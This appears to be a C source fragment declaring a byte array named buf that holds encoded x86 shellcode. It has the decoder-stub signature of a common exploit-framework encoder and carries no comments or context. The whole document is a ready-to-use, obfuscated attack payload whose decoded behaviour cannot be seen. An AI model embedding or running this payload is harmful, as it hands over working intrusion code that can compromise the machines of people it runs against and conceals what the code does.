unsigned char buf[] = 
"\xda\xdb\xd9\x74\x24\xf4\x5f\xbd\x96\xb0\x4c\x64\x33\xc9"
"\xb1\x3d\x31\x6f\x1a\x83\xc7\x04\x03\x6f\x16\xe2\x63\x0a"
"\x35\x8c\x31\x02\x1d\x99\x9c\xa1\x85\xd6\x43\x7b\x0f\xa7"
"\x4c\x4a\xda\xda\x31\x69\xe0\xd9\x19\x94\xb1\x41\x75\x6e"
"\x64\xb8\xb2\xe5\x29\x18\x5f\x4a\x33\xe9\x27\xdb\x97\xec"
"\x6a\x72\xf0\xa7\x82\xef\x12\x86\xbb\xe7\x2f\x2b\xe2\x6c"
"\xd7\x38\x03\x9b\xe0\x5b\xf1\xe7\x89\xf8\xe9\xb6\x77\x30"
"\x95\x22\x2e\xb0\x34\x4a\xf3\x25\x53\x1b\x5a\x7b\x22\xe4"
"\xb4\x23\x75\x82\xac\x02\xa8\x34\x22\x9f\x7e\x48\xf2\x54"
"\x41\x91\x81\x14\xc2\x83\xb7\x6a\x30\xbb\xeb\xd8\xde\xbc"
"\x8b\xa6\x72\x8b\x04\xf4\xa4\xda\x71\x9f\x68\xc9\xe3\x2e"
"\x89\xd5\xf0\xd5\x7c\xd3\x4d\xeb\xd3\xb1\xdb\x53\x1e\x0b"
"\x3e\xd3\xdc\xcb\xfe\xc5\x3d\x67\xf4\xe2\xc1\x51\xe6\x2b"
"\x5a\x78\xa9\x26\x41\xf9\x0b\xe4\x52\x88\xa8\x11\x72\x74"
"\xf3\xda\xfd\x44\xd6\x0e\x9b\x36\x7e\xb2\xe9\x6c\x28\x1a"
"\x50\xc3\xb8\x30\x64\xf0\x0f\x23\x55\x80\x5a\xc2\x9c\x85"
"\x79\x22\xd8\x74\xfb\x32\x3c\x28\xbd\xf6\xd1\xe1\xda\x94"
"\xd6\xbb\x6c\x3c\x86\xf1\x2b\x4d\x34\x07\x10\x29\xfb\xdd"
"\xb4\x52\xa9\x6b\xec\xb3\x30\x22\x3e\xc2\x5d\x84\x1a\x41"
"\x7d\x9d\xa0\xd3";
